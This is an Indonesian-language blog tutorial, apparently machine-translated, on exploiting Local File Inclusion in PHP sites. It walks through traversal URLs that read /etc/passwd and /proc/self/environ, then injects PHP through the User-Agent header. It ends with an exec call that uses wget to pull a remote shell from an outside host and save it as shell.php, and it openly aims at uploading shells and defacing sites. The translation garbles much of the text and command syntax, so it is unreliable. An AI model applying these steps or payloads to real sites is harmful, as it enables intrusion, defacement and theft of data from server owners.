Apa itu LFI?
LFI
(Local File Inclusion) Serangan terjadi di aplikasi web ketika
parameter tidak diperiksa dengan benar dan diperiksa sebelum digunakan
untuk menyertakan file. Dengan
kerentanan ini aliran Penyerang dapat melihat file sewenang-wenang pada
direktori dan bahkan bisa deface situs dengan mengupload Shell dengan
ini mengalir di atas.Hal Diperlukan
LFI situs RentanUser-Agent
Switcher (https://addons.mozilla.org/en-US/firefox...-switcher/) atau u
juga dapat menggunakan tamperdata
(https://addons.mozilla.org/en-US/firefox. .. per-data /)Sebuah remote shellOk jadi mari kita mulai
Menemukan LFI Situs Rentan
Sekarang kita akan menemukan File Inclusion website.So rentan lokal kami menemukan target kami, mari kita periksa itu.
http://www.website.com/view.php?page=contact.php
Sekarang mari kita mengganti contact.php dengan .. / sehingga URL akan menjadi
http://www.website.com/view.php?page=../dan kami punya kesalahan
Warning:
include (.. /) [function.include]: failed to open stream: Tidak ada
berkas atau direktori / home / sirgod / public_html / website.com /
view.php on line 1337
Hal ini menunjukkan bahwa mungkin ada kerentanan di situs target kami.
Memeriksa etc / passwd untuk memeriksa apakah target rentan atau tidak
http://www.website.com/view.php?page=../...etc/passwd
kita punya kesalahan dan tidak ada etc / passwdWarning:
include (.. /) [function.include]: failed to open stream: Tidak ada
berkas atau direktori / home / sirgod / public_html / website.com /
view.php on line 1337
jadi kami pergi lebih direktori up
http://www.website.com/view.php?page=../...etc/passwd
kami berhasil termasuk etc / passwd dan kita pergi hasil seperti ini:
root: x: 00:00: root :/ akar :/ bin / bash bin: x: 1:1: bin :/ bin :/ sbin / nologin daemon: x: 02:02: daemon :/ sbin :/ sbin / Nologin
adm: x: 03:04: adm :/ var / adm :/ sbin / nologin lp: x: 04:07: lp :/
var / spool / lpd sbin :/ / Nologin sync: x: 05:00: sync :/
sbin :/ bin / sync shutdown: x: 6:0: shutdown :/ sbin :/ sbin /
shutdown berhenti: x: 7:0: halt :/ sbin :/ sbin / halt mail: x: 8:12: email :/ var / spool / mail :/ sbin / NologinBerita:
x: 09:13: news :/ etc / news: uucp: x: 10:14: uucp :/ var / spool /
uucp sbin / Nologin Operator :/: x: 11:00: Operator :/ :/ akar sbin
/ nologin games: x: 12:100: games :/ usr / games :/ sbin / nologin
test: x: 13:30: test :/ var / test :/ sbin / Nologin ftp:x:14:50:FTPPengguna :/ var / ftp :/ sbin / Nologintidak ada: x: 99:99: Nobody :/ :/ sbin / Nologin
Memeriksa apakah proc / self / environ dapat diakses
Sekarang mari kita lihat apakah proc / self / environ yang accessible.We menggantikan etc / passwd dengan proc / self / environ
http://www.website.com/view.php?page=../...lf/environ
Jika Anda mendapatkan sesuatu seperti
DOCUMENT_ROOT
= / home / sirgod / public_html GATEWAY_INTERFACE = CGI/1.1 HTTP_ACCEPT
= text / html, application / xml; q = 0,9, aplikasi / xhtml + xml,
image / png, image / jpeg, image / gif,image / x-xbitmap,*
/ *; Q = 0,1 HTTP_COOKIE = PHPSESSID = 134cc7261b341231b9594844ac2ad7ac
HTTP_HOST = www.website.com HTTP_REFERER =
http://www.website.com/index.php?view=../../../../. .
/ / etc / passwd HTTP_USER_AGENT = Opera/9.80 (Windows NT 5.1; U; en)..
Presto/2.2.15 Version/10.00 PATH = / bin :/ usr / bin QUERY_STRING =
view = ..% 2F ..% 2F%
2Fproc% 2Fself% 2Fenviron REDIRECT_STATUS = 200 REMOTE_ADDR =
6x.1xx.4x.1xx REMOTE_PORT = 35.665 REQUEST_METHOD = GET = / index.php?
pandangan 2F ..% 2F ..% 2F ..% .. REQUEST_URI = .. %
2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron
SCRIPT_FILENAME = / home / sirgod / public_html / index.php SCRIPT_NAME =
/ index.php SERVER_ADDR = 1xx.1xx. 1xx.6x
SERVER_ADMIN = webmaster@website.com SERVER_NAME = www.website.com
SERVER_PORT = 80 SERVER_PROTOCOL = HTTP/1.0 SERVER_SIGNATURE =Apache/1.3.37
(Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV / 2 mod_auth_passthrough/2.1
mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server di http://www.website.com
Port 80proc
/ self / environ adalah accessible.If Anda punya sebuah halaman kosong,
sebuah proc error / self / environ tidak dapat diakses atau OS FreeBSD.
Menyuntikkan kode berbahaya dan Mengupload Shell
Sekarang
mari kita menyuntikkan kode berbahaya kita di proc / self / environ.How
kita bisa melakukan itu? Kita bisa menyuntikkan kode kita di User-Agent
HTTP header
Untuk
itu pertama-tama download User-Agent Switcher dan Buka dan klik pada
baru> New User-Agent atau Anda juga dapat menggunakan Tamperdata
Setelah membuka New User Agent di User Agent ganti dengan"<? Php phpinfo ();?>" Tanpa tanda kutipDan
memberikan gambaran apa pun yang Anda sukai dan klik Ok kemudian
refresh halaman Anda akan mendapatkan file Info PHP terbuka di Tab.
Sekarang
lagi pergi ke pengguna Agen dan mengganti User Agent dengan <exec
('wget http://www.sh3ll.org/egy.txt-O shell.php');?> Dan klik ok.
(Http://www.sh3ll.org/egy.txt Anda dapat menempatkan Anda shell hubungan jarak jauh nad-O akan mengubah shell di shell.php)
Sekarang kita telah berhasil diupload shell di situs. Anda akan mendapatkan shell link seperti ini
http://www.website.com/shell.php
bisa di lihat tutoril video nya http://www.youtube.com/watch?feature=player_embedded&v=9MX2aqp7TfY
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment